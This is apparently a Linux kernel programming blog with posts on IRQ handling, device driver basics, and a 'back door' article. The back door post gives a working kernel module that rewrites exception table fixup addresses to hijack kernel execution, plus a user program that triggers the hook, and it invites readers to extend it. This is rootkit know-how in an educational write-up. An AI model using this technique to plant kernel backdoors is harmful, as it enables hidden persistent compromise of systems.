Now we clear the IRQ_REPLAY and IRQ_WAITING flags in the status of our IRQ descriptor. As mentioned earlier, the status field is used to maintain the state of an interrupt line. We clear these flags because we are now going to handle this interrupt, so it will no longer be in replay or waiting mode. The IRQ_WAITING flag is used by device drivers in conjunction with the IRQ_AUTODETECT flag to auto-detect the IRQ line to which their device is connected. Device drivers use the probe_irq_on() function, which sets the IRQ_AUTODETECT and IRQ_WAITING flags for all the IRQ descriptors for which no ISR has yet been registered. After calling probe_irq_on(), the device driver instructs the device to trigger an interrupt and then calls the probe_irq_off() function. probe_irq_off() looks for the IRQ descriptor whose IRQ_AUTODETECT flag is still set but whose IRQ_WAITING flag has been cleared, and returns that IRQ line number to the device driver.

After clearing the IRQ_REPLAY and IRQ_WAITING flags in do_IRQ(), we set the IRQ_PENDING flag. This indicates that we plan to handle this interrupt, provided it is not disabled and not already being handled by another CPU (on SMP machines). The use of the IRQ_PENDING flag is explained in detail in the next few lines.

We have seen the interrupt and want to handle it by calling the set of ISRs (Interrupt Service Routines) registered by different device drivers. We set the IRQ_PENDING flag because seeing an interrupt does not mean we will handle it for sure. The IRQ_PENDING flag helps us in the following two cases:

- The interrupt is disabled (flag IRQ_DISABLED is set). In this case we will not service the interrupt and will just keep it marked as pending (flag IRQ_PENDING is set). Once the interrupt is enabled again (flag IRQ_DISABLED is cleared), the ISRs will be called to service the interrupt. So IRQ_PENDING helps us remember an interrupt which occurred while that interrupt was disabled for some reason.

Note: Here, disabling an interrupt does not mean masking a particular line at the PIC level or disabling all interrupts at the CPU level by clearing the IF flag of the CPU's EFLAGS register. Disabling here means the kernel has been asked not to service the interrupt, but the hardware triggering of the interrupt signal is not stopped at all.

- Another CPU is already handling a previous interrupt request on this IRQ line. In this case the flag IRQ_INPROGRESS will already have been set by that other CPU. Our role is just to mark the interrupt as IRQ_PENDING and, in a way, ask that other CPU to service this interrupt request as well. When that CPU finishes handling the previous interrupt, it checks this flag. Because we have set it, that CPU will go and call all the ISRs once again to service the interrupt request we received on this IRQ line.

Line - 595 to 601
Now we check whether this interrupt is not disabled (flag IRQ_DISABLED is clear) and at the same time is not being handled by another CPU (flag IRQ_INPROGRESS is also clear). If so, we go ahead and clear the IRQ_PENDING flag and set the IRQ_INPROGRESS flag to indicate that we take responsibility for handling this interrupt request. If, while we are handling this interrupt request, another CPU receives an interrupt on the same IRQ line, that CPU will simply set the IRQ_PENDING flag and transfer its responsibility to us; in that case we (the CPU we are executing on) are responsible for serving that interrupt request as well.

Line - 609 to 610
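If there is no ISR to call for this IRQ line (none is registered, or the IRQ is disabled or already being handled elsewhere, so action was left NULL), we simply return from interrupt context after releasing the lock we hold and serving the softirqs (if any are pending).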

Line - 622 to 630
Now we are all set to call the registered ISRs (the device drivers' functions), so that they can figure out which device connected to this IRQ line actually triggered the interrupt and serve it properly. Before calling the ISRs, we release the IRQ descriptor spinlock, so that while we are executing the ISRs this spinlock can be acquired by another interrupt context, which may execute on another CPU for the same IRQ line. That interrupt context on the other CPU will simply set the IRQ_PENDING flag and return without handling the interrupt itself. In this infinite loop we call the handle_IRQ_event() function, which calls all the ISRs registered for this IRQ line one by one. After going through the list of ISRs, we acquire the IRQ descriptor spinlock again, as we need to check and update the status element of the IRQ descriptor. After acquiring the spinlock, we check the IRQ_PENDING flag: if it is clear, we break out of the infinite loop; otherwise we clear the IRQ_PENDING flag of our IRQ descriptor and go into handle_IRQ_event() again to serve the new interrupt request indicated by IRQ_PENDING.
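The interplay of IRQ_PENDING and IRQ_INPROGRESS can be followed in a single-threaded model that leaves out the spinlock and the PIC. This is a sketch, not kernel code: struct irq_model, irq_claim(), run_isrs() and model_do_irq() are hypothetical names, the flag values are chosen for the sketch, and the inject_during field is an invented device for simulating an interrupt that another CPU sees while our ISRs are running.

```c
#define IRQ_INPROGRESS 1u
#define IRQ_DISABLED   2u
#define IRQ_PENDING    4u

/* Hypothetical stand-in for the IRQ descriptor. */
struct irq_model {
    unsigned status;    /* flag bits, as in the status field                 */
    int handled;        /* how many times the ISR list has been run          */
    int inject_during;  /* arrivals to simulate on "another CPU" during ISRs */
};

/* Status bookkeeping of lines 588-601; returns 1 if the caller must run ISRs. */
static int irq_claim(struct irq_model *d)
{
    unsigned status = d->status | IRQ_PENDING;  /* we want to handle it */
    int claimed = 0;

    if (!(status & (IRQ_DISABLED | IRQ_INPROGRESS))) {
        status &= ~IRQ_PENDING;     /* we commit to handling */
        status |= IRQ_INPROGRESS;   /* we are handling it    */
        claimed = 1;
    }
    d->status = status;
    return claimed;
}

/* Stand-in for handle_IRQ_event(), optionally with a concurrent arrival. */
static void run_isrs(struct irq_model *d)
{
    d->handled++;
    if (d->inject_during > 0) {
        d->inject_during--;
        /* The other CPU sees IRQ_INPROGRESS and only leaves IRQ_PENDING set. */
        irq_claim(d);
    }
}

/* The loop of lines 609-631. */
static void model_do_irq(struct irq_model *d)
{
    if (!irq_claim(d))
        return;
    for (;;) {
        run_isrs(d);
        if (!(d->status & IRQ_PENDING))
            break;
        d->status &= ~IRQ_PENDING;
    }
    d->status &= ~IRQ_INPROGRESS;
}
```

With inject_during set to 1, the ISR list runs twice in one call to model_do_irq(): once for the original interrupt and once more for the request that was only marked as pending. With IRQ_DISABLED set, no ISR runs and the descriptor is left with IRQ_PENDING set.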

Line - 631
We come out of the infinite loop described above only when there is no pending request for this IRQ line. Once we are out, most of the work is done, so we clear the IRQ_INPROGRESS flag.

Line - 637 to 638
Now we call the end() function, one of the PIC-related functions stored in the handler element of our IRQ descriptor. This function takes care of the situation where the interrupt we were handling got disabled while we were handling it. Let's say that while we were serving the interrupt by calling all the ISRs for it, the interrupt got disabled (flag IRQ_DISABLED was set) by code running on another CPU. In this case we should not unmask the interrupt line (which we masked by calling the PIC-related ack() function, line 583). If the IRQ has not been disabled, end() will simply unmask the interrupt line at the PIC level and return. After this we go ahead and serve the pending softirqs (if any are marked). We will see in the next section what softirqs are. I will soon post the details of softirqs, tasklets and bottom halves, so keep looking for that on my blog.

Saturday, August 27, 2005

Back Door Entry - Getting hold of Kernel

This article talks about a way to break into the kernel and get hold of it for your own use; in other words, a way to hack a kernel. We will talk with respect to the Linux Kernel, but the same idea can be applied to other kernels as well.


We all know about the paging mechanism used to implement virtual memory. Virtual memory is implemented using the demand paging concept. This means we do not load the whole program into memory in one go; rather, we keep loading the required parts of the program as they are requested. Whenever the program refers to code or data which is not in memory, the system takes a page fault. A page fault is an exception generated by the MMU (Memory Management Unit) of the system. Whenever the page-fault exception occurs, the CPU starts executing the page-fault handler code pointed to by the page-fault entry of the IDT (Interrupt Descriptor Table). I won't discuss details of the IDT in this article; I will write a separate article for that. In short, the IDT is a kernel data structure (an array of pointers to kernel functions which handle hardware interrupts and system-generated exceptions). The IDT is pointed to by the CPU's IDTR register, so the CPU knows where the IDT is in memory. That is why, whenever a hardware interrupt or exception occurs, the system automatically switches to the relevant code whose pointer is placed in the IDT entry. Coming back to page faults: as said earlier, a page fault is an exception and can occur at any time (in user space as well as in kernel space).

Details about Page-Fault Handler:
Page-fault handler handles following specific cases:

- When a page fault occurs in user space (user application code)
  - The user program accessed a virtual memory address outside its virtual user address space. In this case the page fault handler will generate SEGV and the process will be terminated.
  - The user program accessed a valid virtual memory address which is in its user virtual address space, but the virtual page related to it is not in memory (the page table entry is not set). In this case the page-fault handler will swap in the required virtual page, set the required page table entry and return to the instruction that faulted.

- When a page fault occurs in kernel space (kernel code)
  - The kernel accesses a user space virtual address and the page related to that address is not available in memory. In this case the related page will be swapped in and the kernel will access it.
  - The kernel tries to access a user space virtual address which does not fall in the user address space. In this case, the kernel should not generate SEGV; rather, it should handle the situation gracefully. This is the case we will mainly focus on in the rest of this article.

Entering a System Call:

Before going ahead, let's see some code related to system call invocation; it will help us understand this article better.

When we make a system call using a library function, the CPU switches to kernel mode and is set to use the kernel stack of the process. As soon as the execution context enters kernel mode, the CPU jumps to the following kernel function, which can be found in the arch/i386/kernel/entry.S file in the kernel sources:

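ENTRY(system_call)
    pushl %eax                      # save orig_eax
    SAVE_ALL                        # save the processor context on the kernel stack
    GET_CURRENT(%ebx)               # %ebx = task_struct of the current process
    testb $0x02,tsk_ptrace(%ebx)    # PT_TRACESYS
    jne tracesys
    cmpl $(NR_syscalls),%eax        # is the system call number in range?
    jae badsys
    call *SYMBOL_NAME(sys_call_table)(,%eax,4)
    movl %eax,EAX(%esp)             # save the return value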

In this function, first of all the processor context (the state of all the registers in the processor) is saved on the kernel stack, and then the GET_CURRENT macro is used to get the pointer to the process descriptor (task_struct) of the process currently running on the CPU. Finally, the function related to the requested system call is called by picking the function pointer from sys_call_table (a global array of pointers in the kernel, also known as the system call table in general terms), indexed by the system call number in EAX. From this point onwards the called function is responsible for providing the requested functionality to the user space program.

Handling of page-faults in kernel space:

The kernel accesses a user-provided address when a user space program makes a system call to fetch/put some user data from/into the kernel, e.g. the write/read system calls, the ioctl system call etc. In these system calls one of the parameters is a user space address. The kernel puts/fetches data to/from user space with the help of special kernel functions which handle page faults gracefully, if they occur. Some of the kernel functions used to copy data from/to user space are as follows:

- get_user()
- put_user()
- copy_from_user()
- copy_to_user()

Let's take a simple example of the ioctl() system call. Use of the ioctl() function in a user program looks something like this:

int on = 1;
ioctl(fd, FIONBIO, &on);

When the ioctl system call is made, sys_ioctl() is called in the kernel, which further down the line calls one of the above-mentioned functions to fetch/put data in the user-provided buffer. Let's take the get_user() kernel function as an example. It is implemented in the kernel as a macro, and you can find the implementation in the include/asm/uaccess.h file of the kernel sources.

#define get_user(x,ptr) \
({ int __ret_gu,__val_gu; \
    switch(sizeof (*(ptr))) { \
    case 1: __get_user_x(1,__ret_gu,__val_gu,ptr); break; \
    case 2: __get_user_x(2,__ret_gu,__val_gu,ptr); break; \
    case 4: __get_user_x(4,__ret_gu,__val_gu,ptr); break; \
    default: __get_user_x(X,__ret_gu,__val_gu,ptr); break; \
    } \
    (x) = (__typeof__(*(ptr)))__val_gu; \
    __ret_gu; \
})

In this macro "ptr" is the user-provided address, which can cause a page fault. The macro invokes another macro, "__get_user_x", chosen by the size of the object that "ptr" points to (sizeof(*(ptr))), not the size of the pointer itself. This size tells the kernel how many bytes need to be copied from user space, and the matching "__get_user_x" variant is called accordingly.

The implementation of the "__get_user_x" macro is as follows; it can also be found in the include/asm/uaccess.h file:

#define __get_user_x(size,ret,x,ptr) \
__asm__ __volatile__("call __get_user_" #size \
:"=a" (ret),"=d" (x) \
:"0" (ptr))

This macro uses inline assembly to invoke one of the following functions written in assembly language:

- __get_user_1()
- __get_user_2()
- __get_user_4()

We will look at the implementation of only one of these functions to understand it better. Let's analyse what the "__get_user_4()" assembly function does. Its implementation in the Linux kernel is as follows; you can find the code in the arch/i386/lib/getuser.S assembly file:

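.align 4
.globl __get_user_4
__get_user_4:
    addl $3,%eax                # address of the last byte to be read
    movl %esp,%edx
    jc bad_get_user             # address wrapped around
    andl $0xffffe000,%edx       # %edx = current task_struct
    cmpl addr_limit(%edx),%eax  # beyond the user address limit?
    jae bad_get_user
3:  movl -3(%eax),%edx          # the instruction that may page fault
    xorl %eax,%eax              # return 0 on success
    ret

bad_get_user:
    xorl %edx,%edx
    movl $-14,%eax              # return -EFAULT
    ret

.section __ex_table,"a"
    .long 1b,bad_get_user
    .long 2b,bad_get_user
    .long 3b,bad_get_user
.previous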

This is the code in the kernel which actually copies a specific number of bytes (in this case 4 bytes) from the user space buffer into the kernel. While copying the data we might take a page fault, and as we are currently in kernel mode, we need to handle such page faults gracefully. We will shortly discuss the kernel data structures which help with this.

In this function the following instruction actually copies 4 bytes from the address pointed to by EAX (the pointer given by the user space program) into the CPU's EDX register.

3: movl -3(%eax),%edx

We can take a page fault while executing this instruction, so let's see how that is handled. For this the kernel maintains a table of address pairs, known as the exception table (__ex_table). The table has a number of entries and each entry contains two elements; in other words, if we literally view it as a table, it has a number of rows and two columns. The first column contains the address of a kernel instruction which can page fault while accessing a user space address (in our case, the address of the above mov instruction). The second column contains the address of the fix-up code which needs to be called when a page fault occurs on the instruction whose address is stored in the first column. So the table looks like the following:

Exception Table
| page fault address 1 | fix up address 1 |
| page fault address 2 | fix up address 2 |
| page fault address 3 | fix up address 3 |
| page fault address 4 | fix up address 4 |
| page fault address 5 | fix up address 5 |
| page fault address 6 | fix up address 6 |
| page fault address 7 | fix up address 7 |

If we look at the above assembly code of the function __get_user_4(), we will find ".section" in it. This is an assembler directive which tells the assembler to place what follows in a specific section of the executable. In the above function we are instructing the assembler to place the addresses of the faulting kernel instructions and their corresponding fix-up code in the __ex_table section of the Linux kernel binary.

The following assembler directives put the addresses of the faulting instructions and their corresponding fix-up code in the exception table (the __ex_table section of the Linux kernel image).

.long 1b,bad_get_user
.long 2b,bad_get_user
.long 3b,bad_get_user

3b means the nearest label 3 in the backward direction, which is the faulting instruction, i.e. the mov instruction we discussed earlier. In the same way, 1b and 2b refer to the labels 1 and 2 placed on the corresponding instructions of the other __get_user_x functions in the same file. "bad_get_user" is another assembly label which serves as the fix-up code and will be executed if a page fault occurs while executing the instruction at 1b, 2b or 3b.

This is all about the exception table and setting the entries in it, but we must also know how exactly the exception table is used by the page fault handler. This is discussed in the following section.

Use of Exception Table in Page Fault Handler:

In the Linux Kernel, the page fault handler is the do_page_fault() function defined in the arch/i386/mm/fault.c file of the kernel sources.

Let's assume that a page fault occurs while copying data from user space to kernel space. The page fault handler is immediately executed by the CPU, and it checks whether the faulting instruction belongs to user space or kernel space (this determines whether the page fault occurred in a user space program or while executing a kernel instruction). If it occurred in the kernel and cannot be resolved by bringing in a page, the page fault handler (the do_page_fault() function) simply calls the fixup_exception() kernel function.

/* Are we prepared to handle this kernel fault? */
if (fixup_exception(regs))
    return;

Implementation of fixup_exception() function can be found in arch/i386/mm/extable.c file of kernel sources.

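int fixup_exception(struct pt_regs *regs)
{
    const struct exception_table_entry *fixup;

    /* look up the faulting instruction address in the exception table */
    fixup = search_exception_tables(regs->eip);
    if (fixup) {
        /* resume execution at the fix-up code instead */
        regs->eip = fixup->fixup;
        return 1;
    }

    return 0;
}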

The fixup_exception() function looks for the faulting address (regs->eip) in the first column of the exception table, and if it finds it, it sets regs->eip to the address found in the second column (the address of the fix-up code). If the faulting address is not found in the exception table, it means the kernel accessed a wrong address for which it has no fix-up code. In this case the page fault handler must generate an OOPS (all too famous in the kernel world) and dump the kernel state.

This is all about page faults in the kernel and their handling in Linux. Now let's explore the possibilities of exploiting the exception table to redirect execution to our malicious code. This is interesting and will give you a free hand to do anything in the kernel once it is compromised ;-)

Hack kernel using exception table:

Now that we know what the exception table is and what it contains, we can think of exploiting it to get a back door entry into the kernel. In simpler words, if we are able to replace the addresses in the second column (the addresses of fix-up code) of the exception table with the address of our own function, we can execute our function just by generating a page fault in the kernel, and that is not too difficult (just pass a wrong address to the ioctl or write/read system calls, that's it, and control reaches your function). You must be thinking it cannot be that simple. Well, now that you know about the page fault handler and the exception table, it might indeed seem a simple thing to you.

Let's write a practical Linux kernel module which shows how this can be exploited. The following Linux Kernel Module replaces the addresses in the exception table; afterwards we can generate a page fault with a simple user program.

Linux Kernel Module Code:

#ifndef __KERNEL__
#define __KERNEL__
#endif

#ifndef MODULE
#define MODULE
#endif

/* Defaults are specific to one kernel build; override via module parameters */
#define __START___EX_TABLE 0xc0261e20
#define __END___EX_TABLE 0xc0264548
#define BAD_GET_USER 0xc022f39c

unsigned long start_ex_table = __START___EX_TABLE;
unsigned long end_ex_table = __END___EX_TABLE;
unsigned long bad_get_user = BAD_GET_USER;

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/slab.h>
#include <linux/errno.h>

#ifdef FIXUP_DEBUG /* guard name assumed; the original condition was lost */
# define PDEBUG(fmt, args...) printk(KERN_DEBUG "[fixup] : " fmt, ##args)
#else
# define PDEBUG(fmt, args...) do {} while(0)
#endif

MODULE_PARM(start_ex_table, "l");
MODULE_PARM(end_ex_table, "l");
MODULE_PARM(bad_get_user, "l");

/* One saved exception table entry, so that it can be restored on unload */
struct old_ex_entry {
    struct old_ex_entry *next;
    unsigned long address;  /* address of the entry inside the table */
    unsigned long insn;     /* original first column */
    unsigned long fixup;    /* original second column */
};

struct old_ex_entry *ex_old_table;

/* Our replacement for the fix-up code */
void hook(void)
{
    printk(KERN_INFO "You did a Page Fault ..... \n");
}

void cleanup_module(void)
{
    struct old_ex_entry *entry = ex_old_table;
    struct old_ex_entry *tmp;

    if (!entry)
        return;

    /* Restore every saved entry, then free its record */
    while (entry) {
        *(unsigned long *)entry->address = entry->insn;
        *(unsigned long *)((entry->address) + sizeof(unsigned long)) = entry->fixup;
        tmp = entry->next;
        kfree(entry);
        entry = tmp;
    }
}

int init_module(void)
{
    unsigned long insn = start_ex_table;
    unsigned long fixup;
    struct old_ex_entry *entry, *last_entry;

    ex_old_table = NULL;
    PDEBUG("hook at address : %p\n", (void *)hook);

    /* Each table entry is two unsigned longs: insn address, fixup address */
    for (; insn < end_ex_table; insn += 2 * sizeof(unsigned long)) {

        fixup = insn + sizeof(unsigned long);

        if (*(unsigned long *)fixup == bad_get_user) {

            PDEBUG("address : %p insn: %lx fixup : %lx\n",
                   (void *)insn, *(unsigned long *)insn,
                   *(unsigned long *)fixup);

            /* kmalloc() takes the size first, then the allocation flags */
            entry = (struct old_ex_entry *)kmalloc(
                        sizeof(struct old_ex_entry), GFP_ATOMIC);

            if (!entry) {
                /* Out of memory: undo the entries hooked so far */
                cleanup_module();
                return -ENOMEM;
            }

            entry->next = NULL;
            entry->address = insn;
            entry->insn = *(unsigned long *)insn;
            entry->fixup = *(unsigned long *)fixup;

            /* Append the saved entry to the end of the list */
            if (ex_old_table) {
                last_entry = ex_old_table;

                while (last_entry->next != NULL)
                    last_entry = last_entry->next;

                last_entry->next = entry;
            } else
                ex_old_table = entry;

            /* Redirect the fix-up to our own function */
            *(unsigned long *)fixup = (unsigned long)hook;

            PDEBUG("address : %p insn: %lx fixup : %lx\n",
                   (void *)insn, *(unsigned long *)insn,
                   *(unsigned long *)fixup);
        }
    }

    return 0;
}

In the above Linux Kernel Module (LKM), the init_module() function simply searches the exception table for a specific fix-up function (bad_get_user) and, wherever it finds the address of this function in the exception table, replaces it with the address of our own function hook(). It saves the original entries, so that we can restore the exception table to its original form when removing our kernel module.

Now a simple program which calls ioctl() with a bad argument:

#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>
#include <sys/ioctl.h>

int main()
{
    int fd;
    int res;

    fd = open("testfile", O_RDWR | O_CREAT, S_IRWXU);
    if (fd < 0) {
        perror("open");
        return 1;
    }

    /* NULL is a bad user address, so the kernel faults while reading it */
    res = ioctl(fd, FIONBIO, NULL);
    printf("result = %d errno = %d\n", res, errno);
    return 0;
}

Now first load the LKM into the system, then run the user program and look at the /var/log/messages file; it will show the string "You did a Page Fault ..... ". This string is printed by the hook() function of our module.

Now you can think about what you could do with this if, instead of just printing a string in the hook function, you did something more significant. You have the whole kernel world in front of you ;-)


Hope this article helps you in learning more about kernel. The intention of this article is not to hack the kernel, but rather to provide learning material for people who want to learn kernel programming.


Wednesday, February 09, 2005

Introduction to Linux Device Driver Programming

Author: Gaurav Dhiman

Introduction to Linux Device Drivers:

A Linux device driver is the piece of code which knows the device it is controlling very well. It knows the behavior of the device and has knowledge of its internals. Device drivers in Linux can be part of the core kernel itself, or they can be developed as separate modules which can be attached to/detached from the running kernel at any time, giving the kernel the flexibility to support multiple devices in a dynamic environment.

In this article we will talk about writing a device driver as a kernel module. Before talking about device drivers, we should have some basic knowledge of kernel module programming in Linux. In the next few sections we will discuss the basics of kernel module programming before jumping into driver intricacies.

Introduction to Kernel Module Programming:

A kernel module is a piece of code written, compiled and loaded separately from the core kernel, but linked to the core kernel at load time. Kernel modules have a specific structure to follow. There are two standard functions which need to be implemented in any Linux kernel module; we will talk about them a bit later. As mentioned earlier, a kernel module is code which attaches to the core kernel at load time and is executed in kernel (privileged) mode. It is not a user program, which runs in restricted mode and has limited access to memory and other system resources. A module, being part of the kernel, can access any system resource. Because of this, kernel module programmers need to be well-disciplined and take care that their module does not create security loopholes in the kernel. Kernel modules should only do what they are supposed to do. One loosely written kernel module loaded into the core kernel can make the whole system vulnerable.

Module structure:
A module needs to have two standard functions, which take care of initializing and cleaning up the resources used by the module. The standard format of a module is as follows:


/* standard function for initializing the resources used by module */

int init_module(void){
    /* request and register resources here */
    return 0;
}

/* other functions, which implement the functionality of module */

/* standard function for releasing the resources used by module */

void cleanup_module(void){
    /* release the resources acquired in init_module() here */
}

In the init_module() function, we request and acquire the resources required by our module. For example, resources can be an IRQ line (the interrupt line on which our device is going to interrupt), an I/O memory region, a DMA channel etc. We also register a few other things, like the major number used by our driver or the interrupt handlers for the interrupts generated by our device. The init_module() function is called at the time of loading a module into the core kernel, using the “insmod” or “modprobe” command.

In the cleanup_module() function, we release the resources acquired in the init_module() function. This function is called at the time of unloading a module from the core kernel, using the “rmmod” command.

Presenting real time Kernel Module:
Let’s follow the tradition and write the first kernel module “hello_world.c”

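#define __KERNEL__
#define MODULE

#include <linux/module.h>
#include <linux/kernel.h>

int init_module(void){
    /* "<1>" is the log level prefix of the message */
    printk("<1>My Module: Hello World !! \n");
    return 0;
}

void cleanup_module(void){
    printk("<1>My Module: Bye World ..... I am going !! \n");
}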

We need to define the above-mentioned two macros (__KERNEL__ and MODULE) for any module we write. The printk() function is a brother of the printf() function. The major difference between them is that printf() is a standard C library function which resides in user space, while printk() is a kernel function written from scratch.

Now coming the real thing – Device Drivers
Before going to the real code of a device driver, let’s first understand some basic fundamentals of what devices are in Linux. We will also discuss how they are accessed by user processes.

Device Files and Major Numbers:
In Linux, as in any other Unix variant, devices are represented by files in the file system. These files are known as device files or device nodes. Device files are special files through which a user process (program) can communicate (open, read, write, close etc.) with the underlying device. The process uses the standard system calls, like open(), read(), write(), ioctl() etc., to interact with the device. Two special numbers are associated with every device file, known as the major number and the minor number of the device. The major number is used by the kernel to direct the user process's request to the right kernel driver; the kernel itself does not interpret the minor number. The minor number is only used by the driver to identify the exact device which needs to be manipulated. The reason for the existence of the minor number is that, in practice, one driver can handle or control more than one device of the same type, or even of different types, so the driver needs some mechanism through which it can identify which device it needs to manipulate. Let's take an example: if there is a driver ”A” which controls three physical devices “B”, “C” and “D”, then there need to be three device files in the file system with the same major number but different minor numbers.

Device files can be created with “mknod” command. It has the following syntax.

mknod {device name} {device type} {major number} {minor number}

For help on this command, refer to its man page.
It is a convention that device files reside in “/dev” directory of root file system, so it’s always better to create our own device files there rather than creating them somewhere else in file system.

Device Types:
Devices can mainly be categorized into three groups: character devices, block devices and network devices.

Character Devices: These are devices to which a user process can write, or from which it can read, a single character at a time. That means the interaction between the device driver and the actual physical device is in terms of single characters. Examples: keyboard, serial ports, parallel ports.

Block Devices: These are devices to which a user process can write, or from which it can read, a single block of data at a time. Reading and writing on these devices is done in terms of blocks of data. A block can be 512 bytes, 1024 bytes or so. Examples: hard disk, floppy disk.

Network Devices: These are asynchronous devices and are responsible for establishing a network connection to the outside world. The best example of this type of device is a NIC (network interface card).

To keep things simple, this article will only talk about character device drivers.

Opening a Device:
As mentioned earlier, a user process communicates with the underlying device through a device file, so to interact with a device the user process should first open the related device file using the open() system call. Once the device file is opened, the user process receives a file descriptor, which it can refer to in further file manipulation system calls.

Now we will see how things work in the kernel when a device file is opened by a user process. Before discussing that, let’s look at some related data structures.

task_struct: This data structure represents a process or task in the kernel. The kernel uses it to keep track of the processes in the system and the resources they are using. It is one of the main data structures in the kernel and contains a number of elements to track process-specific information.

files_struct: This structure contains the information related to the open files of a process. One of its elements is an array of pointers to “file” structures. This array points to different “file” structures, and the index into this array is returned to the process as the file descriptor when the open system call is made. It also keeps a count of the total number of open files for a process.

file: This structure represents an open file for a process. Do not confuse it with the physical file, which is represented by the “inode” structure in the kernel. This structure only remains in kernel memory while the file is open for a process. As soon as the process closes the file, exits or aborts, the “file” structures representing its open files are destroyed, if they are no longer referred to by any other process.

Some of the elements of “file” structure:

- f_mode: This element tells in what mode the file has been opened by the process. A process can open a file for reading (FMODE_READ), for writing (FMODE_WRITE), or both. This element is normally used by device drivers to check in what mode the device file has been opened.
- f_pos: This element tells the offset (in bytes) at which to read and write in the file.
- f_flags: This element also tells us in which mode the file has been opened (read or write), but it is recommended to use the “f_mode” element to check the mode of the file. This element remembers one important thing which is helpful to driver writers: whether or not the file has been opened in non-blocking mode. By default (if the O_NONBLOCK flag is not given at open time) the file is opened in blocking mode. The driver checks this flag when reading from or writing to a device. If the device file is opened in blocking mode (the default) and at read time there is no data to be read from the device, or at write time the driver-specific buffer is full, the driver puts the process to sleep on one of its local wait queues (we will soon see what wait queues are). If, on the other hand, the device file has been opened in non-blocking mode, the driver does not put the process to sleep; rather, control returns to the user process with an error.
- f_count: This element keeps track of how many processes are referring to this instance of the file. All open files of a parent process are inherited by its child process (and remain open across exec unless the close-on-exec flag is set for them). When the child process inherits the files from the parent process, the “f_count” element of all inherited files is incremented, so that the kernel can keep track of the number of processes using this file structure. The “file” structure (representing an open file) does not get destroyed on every close system call, as it might be shared by other processes. During the close system call the kernel decrements the “f_count” element of the “file” structure, and only if it drops to zero is the “file” structure destroyed and its memory released.
- f_owner: This element tells which process is the owner of this open file. It contains the pid of the owner process. This element is used for sending the SIGIO signal to the right process in case of asynchronous notification. A user process can change this element by using the fcntl() system call.
- f_op: This is an important element from the perspective of a device driver. It points to a structure of pointers to file operations. For a device file (represented by a “file” structure), this element points to the structure which contains pointers to the driver-specific functions. We will discuss in detail the structure (file_operations) to which this element points.

file_operations: This is an important data structure for a device driver, as it is the structure through which the driver registers its functions with the kernel, so that the kernel can call them on different events, like opening a device file, reading/writing a device file or sending ioctl commands to the device. In the case of a device file, this structure contains pointers to the different functions of the driver, through which the kernel invokes the driver. Now we will briefly discuss the elements of this data structure.

Some of the elements of “file_operations” structure

- llseek: This is a pointer to the driver function which moves or sets the “f_pos” element of the device file (discussed earlier).
- read: This is a pointer to the driver function which physically reads data from the device.
- write: This is a pointer to the driver function which physically writes data to the device.
- poll: This function is called by either the “poll” or the “select” system call.
- ioctl: This function is called by the ioctl system call. This function in the driver is used to pass special commands to the device, such as formatting the device or positioning its read/write head, which are different from normal read/write commands.
- mmap: This function of the driver is used to map the device memory area into the process's virtual address space.
- open: This function is used to open a file. In the case of a device file, this function of the driver initializes the device or other bookkeeping data structures.
- flush: This function flushes the driver buffer to the physical file. It should be implemented in the driver if the driver wants to give applications a way to make sure that all the data has physically been put on the device.
- release: This function is called by the close system call, but not for every close system call. As described earlier, one “file” data structure (which represents an open file in the kernel) can be referred to by more than one process if the processes are sharing the file (the best example is FIFO files). In that case the close system call does not release the “file” data structure and only decrements its “f_count” element. If “f_count” turns out to be zero after decrementing, the close system call calls the associated “release” function, which is a driver function in the case of device files. So the “release” function of the driver should clear and release all the memory acquired. “release” is just the opposite of the “open” function.

Few Important Kernel Mechanisms used in Drivers

Wait Queues:
A wait queue is a mechanism through which kernel code can put a process to sleep. It is used in different parts of the kernel wherever the kernel decides to put a process to sleep. The kernel puts a process to sleep when a required event has not yet occurred (e.g. a process wants to read from a device and there is no data to be read). In this case the kernel puts the process to sleep and takes the processor back from it by calling the schedule() function, which is the scheduler of the Linux Kernel. The schedule() function selects and dispatches another process.

Before discussing the functions related to putting a process to sleep, we should look at the data structures used for implementing a wait queue in the kernel.

A wait queue is a linked list of “wait_queue_t” structures. The head of the wait queue is represented by a “wait_queue_head_t” structure, which contains the spin lock used to synchronize access to the wait queue. The “wait_queue_head_t” structure also contains the pointer to the first element in the wait queue. Each element in the wait queue is represented by a “wait_queue_t” structure, which contains a pointer to a “task_struct” structure. It also contains the pointer to the next element in the wait queue. “task_struct” represents a live process in the kernel. With this wait queue mechanism, a driver or any other part of the kernel can keep track of the processes waiting for a specific event to occur.

Putting process to sleep:
A process can be put to sleep by using any of the following kernel functions. You can call these functions from anywhere in the kernel (drivers, modules or the core kernel) when you want to put your process to sleep. Whenever kernel code is executed because a system call was made by a user process, it executes in the context of the process which made the system call. There is an exception to this rule: whenever an interrupt occurs, the kernel code (the interrupt handler) does not execute in process context; it is an anonymous context. This is why we should be careful not to call any function in an interrupt handler which can put the execution thread to sleep. If we do so the kernel will hang, which means the system will hang.

Functions which can put a process to sleep:
- sleep_on(wait_queue_head_t * wait_queue)
- interruptible_sleep_on(wait_queue_head_t * wait_queue)
- sleep_on_timeout(wait_queue_head_t * wait_queue, long timeout)
- interruptible_sleep_on_timeout(wait_queue_head_t * wait_queue, long timeout)

In the functions above, “wait_queue” is the head of the wait queue and “timeout” is a value expressed in jiffies. We will talk about jiffies later. Now we will look at the differences between these functions.
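As a brief aside on the timeout units: a jiffy is one tick of the kernel timer, and the kernel constant HZ gives the number of ticks per second, so a two second timeout is commonly written as 2 * HZ. The conversion can be sketched in user space as below. The function name ms_to_ticks and the idea of passing the tick rate as a parameter are assumptions made for this sketch; in the kernel HZ is a build-time constant.

```c
#include <assert.h>

/*
 * Convert milliseconds to timer ticks (jiffies), rounding up so that
 * the resulting sleep is never shorter than requested.
 * hz is the tick rate in ticks per second (a parameter here only for
 * illustration; the kernel uses the constant HZ).
 */
long ms_to_ticks(long ms, long hz)
{
    assert(ms >= 0 && hz > 0);
    return (ms * hz + 999) / 1000;
}
```

With a tick rate of 100, a request for 15 milliseconds becomes 2 ticks, because a single tick of 10 milliseconds would be too short.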

